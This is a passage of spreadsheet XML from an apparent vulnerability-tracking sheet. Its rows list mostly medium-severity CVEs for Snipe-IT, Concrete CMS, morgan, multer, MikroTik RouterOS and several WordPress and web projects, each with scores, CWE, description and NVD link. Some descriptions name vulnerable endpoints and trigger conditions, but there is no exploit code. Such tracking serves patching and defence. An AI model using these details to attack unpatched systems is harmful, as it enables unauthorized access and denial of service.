          <t>Snipe-IT versions 4.2.0 through 8.6.3 expose Laravel Passport's auto-registered personal-access-token routes (GET, POST, DELETE /oauth/personal-access-tokens*) with only 'web' and 'auth:web' middleware, without the self.api permission gate that Snipe-IT enforces on its own token endpoints (/account/api and /api/v1/account/personal-access-tokens). Any user with a valid web session and the corresponding CSRF token can POST to /oauth/personal-access-tokens and mint a long-lived bearer token for their own account, even when an administrator has denied the self.api permission. The issued token is still subject to existing per-endpoint authorization policies, so this is not a privilege escalation; it defeats the administrative control intended to block API/scripted access at the user's own permission level. Fixed in 8.7.0 (commit 3f74b8c), which registers overriding routes wrapped in the can:self.api middleware.</t>
        </is>
      </c>
      <c r="S1207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86755</t>
        </is>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1208" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86756</t>
        </is>
      </c>
      <c r="D1208" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1208" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1208" s="5" t="inlineStr"/>
      <c r="H1208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1208" s="5" t="inlineStr"/>
      <c r="J1208" s="5" t="inlineStr"/>
      <c r="K1208" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1208" s="5" t="inlineStr"/>
      <c r="M1208" s="5" t="inlineStr"/>
      <c r="N1208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1208" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1208" s="5" t="inlineStr"/>
      <c r="Q1208" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1208" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT 8.5.0 through 8.6.3 contains an open redirect vulnerability in its SAML assertion-consumer endpoint (SamlController::acs, POST /saml/acs). The endpoint wrote the RelayState POST parameter directly into Laravel's url.intended session key with only CR/LF characters stripped, and LoginController later issued redirect()-&gt;intended(), which passes an absolute URL through to the Location header unchanged. An unauthenticated attacker who induces a user of a SAML-SSO-enabled instance to visit a crafted IdP-initiated SSO link can therefore cause the victim's browser to be redirected to an arbitrary absolute external URL immediately after a successful authentication, which the advisory notes facilitates credential-harvesting phishing. No account on the target instance and no compromise of the identity provider are required. Only deployments with SAML SSO enabled are affected. Fixed in 8.7.0 (commit d30b73d, PR #19386), which validates RelayState via a new Helper::sameOriginUrl check before storing it.</t>
        </is>
      </c>
      <c r="S1208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86756</t>
        </is>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1209" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86760</t>
        </is>
      </c>
      <c r="D1209" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1209" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1209" s="5" t="inlineStr"/>
      <c r="H1209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1209" s="5" t="inlineStr"/>
      <c r="J1209" s="5" t="inlineStr"/>
      <c r="K1209" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1209" s="5" t="inlineStr"/>
      <c r="M1209" s="5" t="inlineStr"/>
      <c r="N1209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1209" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1209" s="5" t="inlineStr"/>
      <c r="Q1209" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1209" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions 8.2.0 through 8.6.x (fixed in 8.7.0) contain an incorrect authorization flaw in app/Http/Controllers/Users/UsersController::update(). The single-user edit route assigned the activated field from the request payload before evaluating the canEditAuthFields authorization gate, so an authenticated non-admin user holding the users.edit permission in the target's company scope can submit a full valid PUT request to /users/{id} and toggle the activated flag on any user, including admin and superuser accounts. Deactivating an admin locks that account out of the application until another admin or superuser re-enables it. Only the activated field is affected; username, email, password and permissions remain protected by the gate, no data is disclosed, and the API (Api\UsersController::update) and bulk-edit paths are not affected.</t>
        </is>
      </c>
      <c r="S1209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86760</t>
        </is>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1210" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86761</t>
        </is>
      </c>
      <c r="D1210" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1210" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1210" s="5" t="inlineStr"/>
      <c r="H1210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1210" s="5" t="inlineStr"/>
      <c r="J1210" s="5" t="inlineStr"/>
      <c r="K1210" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1210" s="5" t="inlineStr"/>
      <c r="M1210" s="5" t="inlineStr"/>
      <c r="N1210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1210" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1210" s="5" t="inlineStr"/>
      <c r="Q1210" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1210" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 contain an authorization bypass vulnerability in location print endpoints that fails to enforce per-model authorization checks. Authenticated attackers with location view permission can access printassigned and printallassigned endpoints to retrieve related users, assets, accessories, consumables, and components regardless of their individual model permissions.</t>
        </is>
      </c>
      <c r="S1210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86761</t>
        </is>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1211" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86767</t>
        </is>
      </c>
      <c r="D1211" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1211" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1211" s="5" t="inlineStr"/>
      <c r="H1211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1211" s="5" t="inlineStr"/>
      <c r="J1211" s="5" t="inlineStr"/>
      <c r="K1211" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1211" s="5" t="inlineStr"/>
      <c r="M1211" s="5" t="inlineStr"/>
      <c r="N1211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1211" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1211" s="5" t="inlineStr"/>
      <c r="Q1211" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1211" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to apply company scope filtering to the GET /hardware/requested endpoint when Full Multiple Company Support is enabled, allowing authenticated users with assets.view permission to read pending asset requests from all companies. Attackers can retrieve cross-tenant data including requested asset names, requester display names and profile links, locations, and expected check-in dates without parameter manipulation.</t>
        </is>
      </c>
      <c r="S1211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86767</t>
        </is>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1212" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86768</t>
        </is>
      </c>
      <c r="D1212" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1212" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1212" s="5" t="inlineStr"/>
      <c r="H1212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1212" s="5" t="inlineStr"/>
      <c r="J1212" s="5" t="inlineStr"/>
      <c r="K1212" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1212" s="5" t="inlineStr"/>
      <c r="M1212" s="5" t="inlineStr"/>
      <c r="N1212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1212" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1212" s="5" t="inlineStr"/>
      <c r="Q1212" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1212" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to validate soft-deleted state in API checkout endpoints, allowing authenticated users with checkout permissions to bind live inventory to trashed targets. Attackers can submit POST requests to hardware, component, or consumable checkout endpoints with soft-deleted user, asset, or location IDs to create orphaned references that corrupt the asset ledger and audit trails.</t>
        </is>
      </c>
      <c r="S1212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86768</t>
        </is>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1213" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86773</t>
        </is>
      </c>
      <c r="D1213" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1213" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1213" s="5" t="inlineStr"/>
      <c r="H1213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1213" s="5" t="inlineStr"/>
      <c r="J1213" s="5" t="inlineStr"/>
      <c r="K1213" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1213" s="5" t="inlineStr"/>
      <c r="M1213" s="5" t="inlineStr"/>
      <c r="N1213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1213" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1213" s="5" t="inlineStr"/>
      <c r="Q1213" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1213" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through version 8.6.3 fails to perform object-level authorization in the updateLicense, updateConsumable, updateAccessory, and updateModel endpoints and in the storeModel endpoint for Predefined Kits. The existing check authorizes only the parent Predefined Kit (update on PredefinedKit) and not the child object being attached. As a result, an authenticated user holding only the kits.edit permission can attach a License, Consumable, Accessory, or Asset Model that they are otherwise denied (HTTP 403) from reading directly to a Predefined Kit, and the kit relation index then discloses the attached object's name back to that low-privilege user. This is the update-path and storeModel counterpart to CVE-2026-55478, which fixed only the storeLicense, storeConsumable, and storeAccessory methods in 8.6.2. Note that updateModel was code-vulnerable in 8.6.3 but not reachable in practice because a route-name typo bound the route to a nonexistent controller method, causing HTTP 500 responses. The issue is fixed in Snipe-IT 8.7.0.</t>
        </is>
      </c>
      <c r="S1213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86773</t>
        </is>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87028</t>
        </is>
      </c>
      <c r="D1214" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1214" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G1214" s="5" t="inlineStr"/>
      <c r="H1214" s="5" t="inlineStr"/>
      <c r="I1214" s="5" t="inlineStr"/>
      <c r="J1214" s="5" t="inlineStr"/>
      <c r="K1214" s="5" t="inlineStr"/>
      <c r="L1214" s="5" t="inlineStr"/>
      <c r="M1214" s="5" t="inlineStr"/>
      <c r="N1214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1214" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1214" s="5" t="inlineStr"/>
      <c r="Q1214" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1214" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS 9 through 9.5.3 did not confirm that a board InstanceItem submitted to the custom-slot preview endpoint belonged to the board instance the requesting user was authorized to edit, and did not enforce page-view permission before generating page-backed summary content. As a result, an authenticated user holding edit-board-contents permission on a single board instance could submit the identifier of an item belonging to a different board instance and receive summary fields, including the page title and description, of an underlying page the same user was otherwise forbidden to view. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Pakung for reporting.</t>
        </is>
      </c>
      <c r="S1214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87028</t>
        </is>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1215" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="D1215" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1215" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G1215" s="5" t="inlineStr"/>
      <c r="H1215" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1215" s="5" t="inlineStr"/>
      <c r="J1215" s="5" t="inlineStr"/>
      <c r="K1215" s="5" t="inlineStr"/>
      <c r="L1215" s="5" t="inlineStr"/>
      <c r="M1215" s="5" t="inlineStr"/>
      <c r="N1215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1215" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1215" s="5" t="inlineStr"/>
      <c r="Q1215" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="R1215" s="5" t="inlineStr">
        <is>
          <t>morgan is an HTTP request logger middleware for Node.js. In versions before 1.12.1, its escapeLogField() function does not escape the double quote character, which delimits the quoted fields of the Apache combined log format that morgan emits. An unauthenticated remote attacker who controls a value written to a quoted field, such as the User-Agent or Referer header, can include a double quote to close that field early, so a log consumer that parses the log by field position reads attacker-supplied text as the following field. In the built-in formats this makes the recorded value differ from the value that was sent, and in custom formats that quote an attacker-controlled token before a server-controlled one it can forge values such as the response status. No newline is injected, so record separation stays intact. The issue is fixed in morgan 1.12.1, which escapes the double quote. Users should upgrade to morgan 1.12.1 or later.</t>
        </is>
      </c>
      <c r="S1215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1216" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88932</t>
        </is>
      </c>
      <c r="D1216" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1216" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G1216" s="5" t="inlineStr"/>
      <c r="H1216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1216" s="5" t="inlineStr"/>
      <c r="J1216" s="5" t="inlineStr"/>
      <c r="K1216" s="5" t="inlineStr"/>
      <c r="L1216" s="5" t="inlineStr"/>
      <c r="M1216" s="5" t="inlineStr"/>
      <c r="N1216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1216" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1216" s="5" t="inlineStr"/>
      <c r="Q1216" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-459</t>
        </is>
      </c>
      <c r="R1216" s="5" t="inlineStr">
        <is>
          <t>multer is a Node.js middleware for handling multipart/form-data uploads. In versions 2.2.0 through 2.3.0, when a request using disk storage is aborted mid-upload, file writes that complete after multer has already run its abort cleanup are not removed, so each aborted upload can leave an orphaned file on disk. A remote unauthenticated attacker can repeatedly start and abort uploads to accumulate orphaned files and exhaust disk space, causing a denial of service. The issue is fixed in multer 2.4.0, and users should upgrade to 2.4.0 or later.</t>
        </is>
      </c>
      <c r="S1216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88932</t>
        </is>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1217" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89020</t>
        </is>
      </c>
      <c r="D1217" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1217" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1217" s="5" t="inlineStr"/>
      <c r="H1217" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1217" s="5" t="inlineStr"/>
      <c r="J1217" s="5" t="inlineStr"/>
      <c r="K1217" s="5" t="inlineStr"/>
      <c r="L1217" s="5" t="inlineStr"/>
      <c r="M1217" s="5" t="inlineStr"/>
      <c r="N1217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1217" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1217" s="5" t="inlineStr"/>
      <c r="Q1217" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R1217" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS before 7.23.4 (long-term) and 7.24.2 (stable) contains a stack-based buffer overflow vulnerability in the mtget binary's TFTP RRQ builder function that allows authenticated users to crash the mtget worker process by supplying a URL path of 507 bytes or more to the /tool fetch command; the first write outside the 528-byte buffer occurs at 505 bytes. Attackers can trigger the overflow by issuing a fetch command with a crafted tftp:// URL path, which causes an unbounded rep movsb instruction to overwrite saved registers at a deterministic offset, crashing the process without requiring a reachable TFTP server or elevated privileges beyond read-only group membership.</t>
        </is>
      </c>
      <c r="S1217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89020</t>
        </is>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89030</t>
        </is>
      </c>
      <c r="D1218" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1218" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1218" s="5" t="inlineStr"/>
      <c r="H1218" s="5" t="inlineStr"/>
      <c r="I1218" s="5" t="inlineStr"/>
      <c r="J1218" s="5" t="inlineStr"/>
      <c r="K1218" s="5" t="inlineStr"/>
      <c r="L1218" s="5" t="inlineStr"/>
      <c r="M1218" s="5" t="inlineStr"/>
      <c r="N1218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1218" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1218" s="5" t="inlineStr"/>
      <c r="Q1218" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1218" s="5" t="inlineStr">
        <is>
          <t>Adenion Blog2Social plugin for WordPress before 9.1.0 exposes the email addresses of all registered WordPress users to low-privileged accounts. The b2s_search_user AJAX handler in includes/Ajax/Get.php invokes B2S_Tools::searchUser() in includes/Tools.php, which returns the email address of every matching user without restricting access to callers holding the list_users capability, allowing any user with the edit_posts capability to retrieve user email addresses including those of administrators.</t>
        </is>
      </c>
      <c r="S1218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89030</t>
        </is>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1219" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90527</t>
        </is>
      </c>
      <c r="D1219" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1219" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1219" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1219" s="5" t="inlineStr"/>
      <c r="H1219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1219" s="5" t="inlineStr"/>
      <c r="J1219" s="5" t="inlineStr"/>
      <c r="K1219" s="5" t="inlineStr"/>
      <c r="L1219" s="5" t="inlineStr"/>
      <c r="M1219" s="5" t="inlineStr"/>
      <c r="N1219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1219" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P1219" s="5" t="inlineStr"/>
      <c r="Q1219" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1219" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in quequnlong shiyi-blog up to 1.2.1. Affected is an unknown function of the file blog-admin/src/views/message/message/index.vue of the component Add Message API. The manipulation of the argument body.content results in cross site scripting. The attack can be executed remotely. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90527</t>
        </is>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1220" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90941</t>
        </is>
      </c>
      <c r="D1220" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1220" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1220" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1220" s="5" t="inlineStr"/>
      <c r="H1220" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1220" s="5" t="inlineStr"/>
      <c r="J1220" s="5" t="inlineStr"/>
      <c r="K1220" s="5" t="inlineStr"/>
      <c r="L1220" s="5" t="inlineStr"/>
      <c r="M1220" s="5" t="inlineStr"/>
      <c r="N1220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1220" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1220" s="5" t="inlineStr"/>
      <c r="Q1220" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1220" s="5" t="inlineStr">
        <is>
          <t>novel-plus through 5.3.3 contains an authorization bypass vulnerability in the BookController download endpoint that allows authenticated backend accounts to export complete book text including paid chapters. Attackers can supply a bookId and bookName to retrieve all chapter content without VIP or purchase verification, bypassing the permission checks and data-scope limits enforced elsewhere in the admin interface.</t>
        </is>
      </c>
      <c r="S1220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90941</t>
        </is>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92216</t>
        </is>
      </c>
      <c r="D1221" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1221" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1221" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1221" s="5" t="inlineStr"/>
      <c r="H1221" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1221" s="5" t="inlineStr"/>
      <c r="J1221" s="5" t="inlineStr"/>
      <c r="K1221" s="5" t="inlineStr"/>
      <c r="L1221" s="5" t="inlineStr"/>
      <c r="M1221" s="5" t="inlineStr"/>
      <c r="N1221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1221" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1221" s="5" t="inlineStr"/>
      <c r="Q1221" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1221" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in a2ui-project a2ui up to 0.10.7. Affected by this issue is the function openUrl of the file renderers/web_core/src/v0_9/rendering/generic-binder.ts of the component Binder. The manipulation results in open redirect. It is possible to launch the attack remotely. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S1221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92216</t>
        </is>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92356</t>
        </is>
      </c>
      <c r="D1222" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1222" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1222" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1222" s="5" t="inlineStr"/>
      <c r="H1222" s="5" t="inlineStr"/>
      <c r="I1222" s="5" t="inlineStr"/>
      <c r="J1222" s="5" t="inlineStr"/>
      <c r="K1222" s="5" t="inlineStr"/>
